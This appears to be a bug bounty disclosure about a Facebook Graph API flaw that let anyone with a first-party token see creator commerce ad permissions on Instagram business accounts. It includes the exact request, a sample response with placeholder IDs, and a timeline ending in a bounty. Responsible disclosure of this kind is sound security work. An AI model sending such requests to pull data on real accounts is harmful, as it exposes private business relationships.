Disclose the commerce creation ad permissions of creator’s (ig_user)

This bug was accidently found while playing with the facebook graph api that allows anyone with first party access token to view the creators (ig_user) and their commerce creation ad permissions on any instagram business account.

Proof of concept

Request:

GET /v17.0/{business-id}/?fields=creator_commerce_ad_permissions{brand_linked_fb_page,brand_ig_user,creator_linked_fb_page,permission_created_time,brand_ig_fbid,creator_ig_user,id,permission_status}
Host: graph.facebook.com

Response:

{
"creator_commerce_ad_permissions": {
"data": [
{
"id": "123456789",
"brand_linked_fb_page": {
"name": "Page Name 1",
"id": "PageID_1"
},
"brand_ig_user": {
"id": "17xxxxxxxxxxxxx"
},
"creator_linked_fb_page": {
"name": "Page Name 2",
"id": "PageID_2"
},
"permission_created_time": 1654003658,
"brand_ig_fbid": "17xxxxxxxxxxxxx",
"creator_ig_user": {
"id": "17xxxxxxxxxxxxx"
},
"permission_status": 5
},
        ],
    }     
}      

Impact

This could have let anyone to disclose the creator’s (ig_user) and their commerce creation ad permissions.

Timeline

• 26 Sep, 2021 — Report Sent to Facebook.
• 27 Sep, 2021 — Closed as informative by Facebook.
• 16 Jan, 2023 — Got to know another security researcher rewarded ( 23 Jun, 2022) for the same issue I reported from Amol Baikar who got duplicate to the second reporter.
• 19 Jan, 2023 — Requested facebook team to review my report.
• 26 Apr, 2023 — Acknowledged by Facebook and awarded with bounty on the same day.